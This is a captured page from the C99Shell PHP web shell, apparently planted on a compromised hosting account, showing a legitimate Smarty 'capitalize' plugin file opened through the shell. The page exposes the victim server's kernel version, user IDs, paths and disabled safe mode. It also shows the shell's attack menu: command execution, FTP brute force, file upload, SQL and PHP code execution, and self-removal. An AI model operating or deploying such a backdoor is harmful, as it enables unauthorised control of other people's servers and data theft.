!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache/2.2.22 (Debian). PHP/5.6.36 

uname -a: Linux h05.hvosting.ua 4.9.110-amd64 #3 SMP Sun Nov 4 16:27:09 UTC 2018 x86_64 

uid=1389(h33678) gid=1099(h33678) groups=1099(h33678),502(mgrsecure) 

Safe-mode: OFF (not secure)

/home/h33678/data/www/inet-tech.org.ua/smarty/plugins/   drwxr-xr-x
Free 116.9 GB of 200.55 GB (58.29%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     modifier.capitalize.php (2.61 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
 * Smarty plugin
 * 
 * @package Smarty
 * @subpackage PluginsModifier
 */

/**
 * Smarty capitalize modifier plugin
 * 
 * Type:     modifier<br>
 * Name:     capitalize<br>
 * Purpose:  capitalize words in the string
 *
 * {@internal {$string|capitalize:true:true} is the fastest option for MBString enabled systems }}
 *
 * @param string  $string    string to capitalize
 * @param boolean $uc_digits also capitalize "x123" to "X123"
 * @param boolean $lc_rest   capitalize first letters, lowercase all following letters "aAa" to "Aaa"
 * @return string capitalized string
 * @author Monte Ohrt <monte at ohrt dot com> 
 * @author Rodney Rehm
 */
function smarty_modifier_capitalize($string$uc_digits false$lc_rest false)
{
    if (
SMARTY_MBSTRING /* ^phpunit */&&empty($_SERVER['SMARTY_PHPUNIT_DISABLE_MBSTRING'])/* phpunit$ */) {
        if (
$lc_rest) {
            
// uppercase (including hyphenated words)
            
$upper_string mb_convert_case$stringMB_CASE_TITLESMARTY_RESOURCE_CHAR_SET );
        } else {
            
// uppercase word breaks
            
$upper_string preg_replace("!(^|[^\p{L}'])([\p{Ll}])!ueS""stripslashes('\\1').mb_convert_case(stripslashes('\\2'),MB_CASE_UPPER, SMARTY_RESOURCE_CHAR_SET)"$string);
        }
        
// check uc_digits case
        
if (!$uc_digits) {
            if (
preg_match_all("!\b([\p{L}]*[\p{N}]+[\p{L}]*)\b!u"$string$matchesPREG_OFFSET_CAPTURE)) {
                foreach(
$matches[1] as $match) {
                    
$upper_string substr_replace($upper_stringmb_strtolower($match[0], SMARTY_RESOURCE_CHAR_SET), $match[1], strlen($match[0]));
                }
            } 
        }
        
$upper_string preg_replace("!((^|\s)['\"])(\w)!ue""stripslashes('\\1').mb_convert_case(stripslashes('\\3'),MB_CASE_UPPER, SMARTY_RESOURCE_CHAR_SET)"$upper_string);
        return 
$upper_string;
    }
    
    
// lowercase first
    
if ($lc_rest) {
        
$string strtolower($string);
    }
    
// uppercase (including hyphenated words)
    
$upper_string preg_replace("!(^|[^\p{L}'])([\p{Ll}])!ueS""stripslashes('\\1').ucfirst(stripslashes('\\2'))"$string); 
    
// check uc_digits case
    
if (!$uc_digits) {
        if (
preg_match_all("!\b([\p{L}]*[\p{N}]+[\p{L}]*)\b!u"$string$matchesPREG_OFFSET_CAPTURE)) {
            foreach(
$matches[1] as $match) {
                
$upper_string substr_replace($upper_stringstrtolower($match[0]), $match[1], strlen($match[0]));
            }
        } 
    }
    
$upper_string preg_replace("!((^|\s)['\"])(\w)!ue""stripslashes('\\1').strtoupper(stripslashes('\\3'))"$upper_string);
    return 
$upper_string;


?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by PinoyWH1Z | C99Shell Github | Generation time: 0.0155 ]--